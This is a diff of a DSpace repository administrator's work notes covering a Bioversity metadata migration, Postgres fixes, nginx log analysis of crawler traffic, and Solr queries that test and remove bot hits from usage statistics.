    $ perl-rename -n 's/_{2,3}/_/g' *.pdf
     
    • I was going preparing to run SAFBuilder for the Bioversity migration and decided to check the list of PDFs on my local machine versus on DSpace Test (where I had downloaded them last month)
        @@ -426,25 +426,25 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
    -
    $ rename -v 's/___/_/g'  *.pdf
    -$ rename -v 's/__/_/g'  *.pdf
    +
    $ rename -v 's/___/_/g'  *.pdf
    +$ rename -v 's/__/_/g'  *.pdf
     
    • I’m still waiting to hear what Carol and Francesca want to do with the 1195.pdf.LCK file (for now I’ve removed it from the CSV, but for future reference it has the number 630 in its permalink)
    • I wrote two fairly long GREL expressions to clean up the institutional author names in the dc.contributor.author and dc.identifier.citation fields using OpenRefine
        -
      • The first targets acronyms in parentheses like “International Livestock Research Institute (ILRI)":
      • +
      • The first targets acronyms in parentheses like “International Livestock Research Institute (ILRI)”:
    -
    value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,"")
    +
    value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,"")
     
    • The second targets cities and countries after names like “International Livestock Research Intstitute, Kenya”:
    -
    replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,"")
    +
    replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,"")
     
    • I imported the 1,427 Bioversity records with bitstreams to a new collection called 2019-09-20 Bioversity Migration Test on DSpace Test (after splitting them in two batches of about 700 each):
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
     $ dspace import -a me@cgiar.org -m 2019-09-20-bioversity1.map -s /home/aorth/Bioversity/bioversity1
     $ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bioversity/bioversity2
     
      @@ -513,7 +513,7 @@ $ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bio
    • Get a list of institutions from CCAFS’s Clarisa API and try to parse it with jq, do some small cleanups and add a header in sed, and then pass it through csvcut to add line numbers:
    -
    $ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
    +
    $ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
     $ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv -u
     
    • The csv-metadata-quality tool caught a few records with excessive spacing and unnecessary Unicode
    • diff --git a/docs/2019-10/index.html b/docs/2019-10/index.html index d0406e12f..0f8043cb6 100644 --- a/docs/2019-10/index.html +++ b/docs/2019-10/index.html @@ -18,7 +18,7 @@ - + @@ -113,7 +113,7 @@
    -
    $ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv > /tmp/iwmi-title-region-subregion-river.csv
    +
    $ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv > /tmp/iwmi-title-region-subregion-river.csv
     
    • Then I replace them in vim with :% s/\%u00a0/ /g because I can’t figure out the correct sed syntax to do it directly from the pipe above
    • I uploaded those to CGSpace and then re-exported the metadata
    • @@ -121,7 +121,7 @@
    • I modified the script so it replaces the non-breaking spaces instead of removing them
    • Then I ran the csv-metadata-quality script to do some general cleanups (though I temporarily commented out the whitespace fixes because it was too many thousands of rows):
    -
    $ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
    +
    $ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
     
    • That fixed 153 items (unnecessary Unicode, duplicates, comma–space fixes, etc)
    • Release version 0.3.1 of the csv-metadata-quality script with the non-breaking spaces change
    • @@ -134,7 +134,7 @@
      • Create an account for Bioversity’s ICT consultant Francesco on DSpace Test:
      -
      $ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
      +
      $ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
       
      • Email Francesca and Carol to ask for follow up about the test upload I did on 2019-09-21
          @@ -193,20 +193,20 @@
      -
      $ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
      +
      $ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
       

      2019-10-11

      • I ran the DSpace cleanup function on CGSpace and it found some errors:
      $ dspace cleanup -v
       ...
      -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      -  Detail: Key (bitstream_id)=(171221) is still referenced from table "bundle".
      +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      +  Detail: Key (bitstream_id)=(171221) is still referenced from table "bundle".
       
      • The solution, as always, is (repeat as many times as needed):
      # su - postgres
      -$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
      +$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
       UPDATE 1
       

      2019-10-12

        @@ -229,12 +229,12 @@ International Centre for Tropical Agriculture,International Center for Tropical International Maize and Wheat Improvement Center (CIMMYT),International Maize and Wheat Improvement Center International Centre for Agricultural Research in the Dry Areas,International Center for Agricultural Research in the Dry Areas International Maize and Wheat Improvement Centre,International Maize and Wheat Improvement Center -"Agricultural Information Resource Centre, Kenya.","Agricultural Information Resource Centre, Kenya" -"Centre for Livestock and Agricultural Development, Cambodia","Centre for Livestock and Agriculture Development, Cambodia" +"Agricultural Information Resource Centre, Kenya.","Agricultural Information Resource Centre, Kenya" +"Centre for Livestock and Agricultural Development, Cambodia","Centre for Livestock and Agriculture Development, Cambodia"
      • Then I applied it with my fix-metadata-values.py script on CGSpace:
      -
      $ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
      +
      $ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
       
      • I did some manual curation of about 300 authors in OpenRefine in preparation for telling Peter and Abenet that the migration is almost ready
          @@ -270,7 +270,7 @@ real 82m35.993s
      • I looked in the database to find authors that had “|” in them:
      -
      dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
      +
      dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
                   text_value            | resource_id 
       ----------------------------------+-------------
        Anandajayasekeram, P.|Puskur, R. |         157
      @@ -280,7 +280,7 @@ real    82m35.993s
       
      • Then I found their handles and corrected them, for example:
      -
      dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
      +
      dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
         handle   
       -----------
        10568/129
      @@ -304,10 +304,10 @@ real    82m35.993s
       
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
     $ mkdir 2019-10-15-Bioversity
     $ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-10-15-Bioversity
    -$ sed -i '/<dcvalue element="identifier" qualifier="uri">/d' 2019-10-15-Bioversity/*/dublin_core.xml
    +$ sed -i '/<dcvalue element="identifier" qualifier="uri">/d' 2019-10-15-Bioversity/*/dublin_core.xml
     
    • It’s really stupid, but for some reason the handles are included even though I specified the -m option, so after the export I removed the dc.identifier.uri metadata values from the items
    • Then I imported a test subset of them in my local test environment:
    • @@ -317,7 +317,7 @@ $ sed -i '/<dcvalue element="identifier" qualifier="uri"&
    • I had forgotten (again) that the dspace export command doesn’t preserve collection ownership or mappings, so I will have to create a temporary collection on CGSpace to import these to, then do the mappings again after import…
    • On CGSpace I will increase the RAM of the command line Java process for good luck before import…
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s 2019-10-15-Bioversity
     
    • After importing the 1,367 items I re-exported the metadata, changed the owning collections to those based on their type, then re-imported them
    • diff --git a/docs/2019-11/index.html b/docs/2019-11/index.html index 7ee04a2e2..70a86b88e 100644 --- a/docs/2019-11/index.html +++ b/docs/2019-11/index.html @@ -15,17 +15,17 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli -# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019" +# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019" 4671942 -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019" +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019" 1277694 So 4.6 million from XMLUI and another 1.2 million from API requests Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats): -# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019" +# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019" 1183456 -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams" +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams" 106781 " /> @@ -45,20 +45,20 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli -# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019" +# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019" 4671942 -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019" +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019" 1277694 So 4.6 million from XMLUI and another 1.2 million from API requests Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats): -# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019" +# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019" 1183456 -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams" +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams" 106781 "/> - + @@ -152,22 +152,22 @@ Let’s see how many of the REST API requests were for bitstreams (because t
    -
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
    +
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
     4671942
    -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
    +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
     1277694
     
    • So 4.6 million from XMLUI and another 1.2 million from API requests
    • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
    -
    # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
    +
    # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
     1183456 
    -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
    +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
     106781
     
    • The types of requests in the access logs are (by lazily extracting the sixth field in the nginx log)
    -
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | awk '{print $6}' | sed 's/"//' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | awk '{print $6}' | sed 's/"//' | sort | uniq -c | sort -n
           1 PUT
           8 PROPFIND
         283 OPTIONS
    @@ -177,7 +177,7 @@ Let’s see how many of the REST API requests were for bitstreams (because t
     
    • Two very active IPs are 34.224.4.16 and 34.234.204.152, which made over 360,000 requests in October:
    -
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
    +
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
     365288
     
    • Their user agent is one I’ve never seen before:
    • @@ -186,22 +186,22 @@ Let’s see how many of the REST API requests were for bitstreams (because t
    • Most of them seem to be to community or collection discover and browse results pages like /handle/10568/103/discover:
    -
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -o -E "GET /(bitstream|discover|handle)" | sort | uniq -c
    +
    # zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -o -E "GET /(bitstream|discover|handle)" | sort | uniq -c
        6566 GET /bitstream
      351928 GET /handle
    -# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c discover
    +# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c discover
     214209
    -# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c browse
    +# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c browse
     86874
     
    • As far as I can tell, none of their requests are counted in the Solr statistics:
    -
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&rows=0&wt=json&indent=true'
    +
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&rows=0&wt=json&indent=true'
     
    • Still, those requests are CPU intensive so I will add their user agent to the “badbots” rate limiting in nginx to reduce the impact on server load
    • After deploying it I checked by setting my user agent to Amazonbot and making a few requests (which were denied with HTTP 503):
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:"Amazonbot/0.1"
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:"Amazonbot/0.1"
     
    • On the topic of spiders, I have been wanting to update DSpace’s default list of spiders in config/spiders/agents, perhaps by dropping a new list in from Atmire’s COUNTER-Robots project
        @@ -210,23 +210,23 @@ Let’s see how many of the REST API requests were for bitstreams (because t
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
    -$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
    -$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"iskanie"
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
    +$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
    +$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"iskanie"
     
    • A bit later I checked Solr and found three requests from my IP with that user agent this month:
    -
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&fq=dateYearMonth%3A2019-11&rows=0'
    -<?xml version="1.0" encoding="UTF-8"?>
    +
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&fq=dateYearMonth%3A2019-11&rows=0'
    +<?xml version="1.0" encoding="UTF-8"?>
     <response>
    -<lst name="responseHeader"><int name="status">0</int><int name="QTime">1</int><lst name="params"><str name="q">ip:73.178.9.24 AND userAgent:iskanie</str><str name="fq">dateYearMonth:2019-11</str><str name="rows">0</str></lst></lst><result name="response" numFound="3" start="0"></result>
    +<lst name="responseHeader"><int name="status">0</int><int name="QTime">1</int><lst name="params"><str name="q">ip:73.178.9.24 AND userAgent:iskanie</str><str name="fq">dateYearMonth:2019-11</str><str name="rows">0</str></lst></lst><result name="response" numFound="3" start="0"></result>
     </response>
     
    • Now I want to make similar requests with a user agent that is included in DSpace’s current user agent list:
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
    -$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
    -$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"celestial"
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
    +$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
    +$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"celestial"
     
    • After twenty minutes I didn’t see any requests in Solr, so I assume they did not get logged because they matched a bot list…
        @@ -247,7 +247,7 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
    -
    else if (line.hasOption('m'))
    +
    else if (line.hasOption('m'))
     {
         SolrLogger.markRobotsByIP();
     }
    @@ -263,16 +263,16 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
     
    • I added “alanfuu2” to the example spiders file, restarted Tomcat, then made two requests to DSpace Test:
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu1"
    -$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu2"
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu1"
    +$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu2"
     
    • After committing the changes in Solr I saw one request for “alanfuu1” and no requests for “alanfuu2”:
    -
    $ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
    -$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
    -  <result name="response" numFound="1" start="0">
    -$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
    -  <result name="response" numFound="0" start="0"/>
    +
    $ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
    +$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
    +  <result name="response" numFound="1" start="0">
    +$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
    +  <result name="response" numFound="0" start="0"/>
     
    • So basically it seems like a win to update the example file with the latest one from Atmire’s COUNTER-Robots list
        @@ -281,16 +281,16 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanf
      • I’m curious how the special character matching is in Solr, so I will test two requests: one with “www.gnip.com” which is in the spider list, and one with “www.gnyp.com” which isn’t:
      -
      $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnip.com"
      -$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnyp.com"
      +
      $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnip.com"
      +$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnyp.com"
       
      • Then commit changes to Solr so we don’t have to wait:
      -
      $ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
      -$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound 
      -  <result name="response" numFound="0" start="0"/>
      -$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
      -  <result name="response" numFound="1" start="0">
      +
      $ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
      +$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound 
      +  <result name="response" numFound="0" start="0"/>
      +$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
      +  <result name="response" numFound="1" start="0">
       
      • So the blocking seems to be working because “www.gnip.com” is one of the new patterns added to the spiders file…
      @@ -314,24 +314,24 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.g
    -
    $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="62944" start="0">
    +
    $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="62944" start="0">
     
    • Similar for com.plumanalytics, Grammarly, and ltx71!
    -
    $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:
    -*com.plumanalytics*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="28256" start="0">
    -$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="6288" start="0">
    -$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="105663" start="0">
    +
    $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:
    +*com.plumanalytics*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="28256" start="0">
    +$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="6288" start="0">
    +$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="105663" start="0">
     
    • Deleting these seems to work, for example the 105,000 ltx71 records from 2018:
    -
    $ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=<delete><query>userAgent:*ltx71*</query><query>type:0</query></delete>&commit=true'
    -$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="0" start="0"/>
    +
    $ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=<delete><query>userAgent:*ltx71*</query><query>type:0</query></delete>&commit=true'
    +$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="0" start="0"/>
     
    • I wrote a quick bash script to check all these user agents against the CGSpace Solr statistics cores
        @@ -341,21 +341,21 @@ $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&a
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&facet.field=dateYearMonth&facet.mincount=1&facet.offset=0&facet.limit=
    -12&q=userAgent:*Unpaywall*' | xmllint --format - | less
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&facet.field=dateYearMonth&facet.mincount=1&facet.offset=0&facet.limit=
    +12&q=userAgent:*Unpaywall*' | xmllint --format - | less
     ...
    -  <lst name="facet_counts">
    -    <lst name="facet_queries"/>
    -    <lst name="facet_fields">
    -      <lst name="dateYearMonth">
    -        <int name="2019-10">198624</int>
    -        <int name="2019-05">88422</int>
    -        <int name="2019-06">79911</int>
    -        <int name="2019-09">67065</int>
    -        <int name="2019-07">39026</int>
    -        <int name="2019-08">36889</int>
    -        <int name="2019-04">36512</int>
    -        <int name="2019-11">760</int>
    +  <lst name="facet_counts">
    +    <lst name="facet_queries"/>
    +    <lst name="facet_fields">
    +      <lst name="dateYearMonth">
    +        <int name="2019-10">198624</int>
    +        <int name="2019-05">88422</int>
    +        <int name="2019-06">79911</int>
    +        <int name="2019-09">67065</int>
    +        <int name="2019-07">39026</int>
    +        <int name="2019-08">36889</int>
    +        <int name="2019-04">36512</int>
    +        <int name="2019-11">760</int>
           </lst>
         </lst>
     
      @@ -423,17 +423,17 @@ istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do
    • Testing modifying some of the COUNTER-Robots patterns to use [0-9] instead of \d digit character type, as Solr’s regex search can’t use those
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"Scrapoo/1"
    -$ http "http://localhost:8081/solr/statistics/update?commit=true"
    -$ http "http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*" | xmllint --format - | grep numFound
    -  <result name="response" numFound="1" start="0">
    -$ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/" | xmllint --format - | grep numFound
    -  <result name="response" numFound="1" start="0">
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"Scrapoo/1"
    +$ http "http://localhost:8081/solr/statistics/update?commit=true"
    +$ http "http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*" | xmllint --format - | grep numFound
    +  <result name="response" numFound="1" start="0">
    +$ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/" | xmllint --format - | grep numFound
    +  <result name="response" numFound="1" start="0">
     
    • Nice, so searching with regex in Solr with // syntax works for those digits!
    • I realized that it’s easier to search Solr from curl via POST using this syntax:
    -
